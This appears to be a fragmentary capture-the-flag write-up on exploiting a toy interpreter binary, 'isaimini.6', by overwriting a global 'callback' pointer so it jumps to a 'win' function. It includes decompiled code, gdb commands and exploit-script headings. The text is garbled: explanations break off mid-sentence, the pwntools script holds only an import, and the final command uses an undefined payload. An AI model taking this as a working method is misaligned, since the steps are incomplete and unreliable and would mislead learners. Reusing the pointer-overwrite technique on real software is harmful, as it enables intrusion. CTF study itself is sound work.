Isaimini.6 -

There is no direct path to win from the interpreter: it is only reachable via a function pointer stored in the global variable callback. The pointer is used after the instruction loop finishes:

Functions identified in the binary:

FUN_00401000  entry point (main)
FUN_00401200  parse_input
FUN_00401430  execute
FUN_00401780  op_add
FUN_00401810  op_sub
FUN_004018c0  op_load
FUN_00401950  op_store
FUN_00401b10  win

Decompiled main:

#include <stdio.h>
#include <unistd.h>

void parse_input(char *buf);   /* FUN_00401200 */
void execute(void);            /* FUN_00401430 */

int main(void)
{
    char buf[256];
    read(0, buf, 256);         /* instruction stream comes from stdin */
    parse_input(buf);
    execute();
    puts("Failure!");
    return 0;
}

Thus, if we can make callback point to win, the program will call win after finishing the instruction stream, and we win.

5. Vulnerability Discovery

The ST instruction performs:

Success!

If the real binary prints the flag, you will see it after Success!.

In gdb:

(gdb) file isaimini.6
(gdb) set disassembly-flavor intel
(gdb) break *0x00401430        # break at start of execute()
(gdb) run
(gdb) x/4gx $rsp               # view saved RIP after HLT
(gdb) x/gx 0x00603010          # examine callback after ST
(gdb) continue

You should see that after the ST instruction the memory at 0x00603010 holds 0x401b10. When the interpreter reaches the final if (callback) check, it jumps to that address and prints the success message.

8. Full Exploit Script (Python / pwntools)

#!/usr/bin/env python3
from pwn import *

Putting it together (little-endian encoding for the immediate):

# Send the payload via stdin
printf "$payload" | ./isaimini.6